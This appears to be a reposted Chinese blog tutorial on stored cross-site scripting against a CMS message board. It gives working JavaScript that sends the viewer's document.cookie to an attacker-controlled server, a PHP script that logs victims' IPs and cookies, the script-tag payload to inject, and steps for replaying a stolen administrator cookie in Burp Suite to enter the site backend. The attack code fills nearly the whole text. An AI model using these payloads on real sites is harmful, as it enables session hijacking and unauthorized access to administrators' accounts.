XSS注入实例-CMS

发布时间:2024年01月20日

CMS

1.寻找目标网站的 xss 攻击点

留言板

论坛发帖页面

(逢框就插)

2.制作并搭建接收远程 Cookie 的服务器(kali)

打开kali的web服务
在这里插入图片描述

制作一个 JS 文件

cd /var/www/html
vi xss.js
var img=document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://192.168.65.130/xss.php?c='+document.cookie;


:wq

进入根目录 /var/www/html

制作一个 PHP 文件

vi xss.php
<?php
$ip = $_SERVER["REMOTE_ADDR"];
$cookie = $_GET["c"];
$fp="var/www/html/xss.txt";
$file = fopen($fp,"a+");
fwrite($file,$ip."\n");
fwrite($file,$cookie."\n");
fclose($file);
?>


:wq

在这里插入图片描述

给文件和目录执行权限

chmod 777 xss.js
...
或者
cd ..
chmod -R 777 html

在这里插入图片描述

3.确认攻击点

在输入区域提交XSS攻击脚本

<script>alert("xss")</script>

在这里插入图片描述

如脚本能够执行,有弹窗,则存在攻击点

某些网站发布的留言不会立即在前端显示,需要管理员审核,此时无法获知是否存在攻击点

在这里插入图片描述

当管理员点开留言时
在这里插入图片描述

4.提交盗取管理员 Cookie 的攻击代码

在输入框提交攻击代码

<script language=javascript src=http://192.168.65.130/xss.js></script>

在这里插入图片描述

5.等待管理员登录并查看留言

待管理员登录查看留言以后,盗取cookie
在这里插入图片描述

leafpad xss.txt
没有下载下载即可

在这里插入图片描述

6.使用接收到的管理员 Cookie 绕过身份验证直接登录网站后台

在主界面点击用户登录使用burpsuite进行抓包替换cookie
在这里插入图片描述
成功进入后台
在这里插入图片描述

直接匹配规则:
进入Match and replace rules
点击add
输入:
^Cookie.*$
Cookie: 值
勾上regex match
文章来源:https://blog.csdn.net/weixin_62715196/article/details/135678122
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。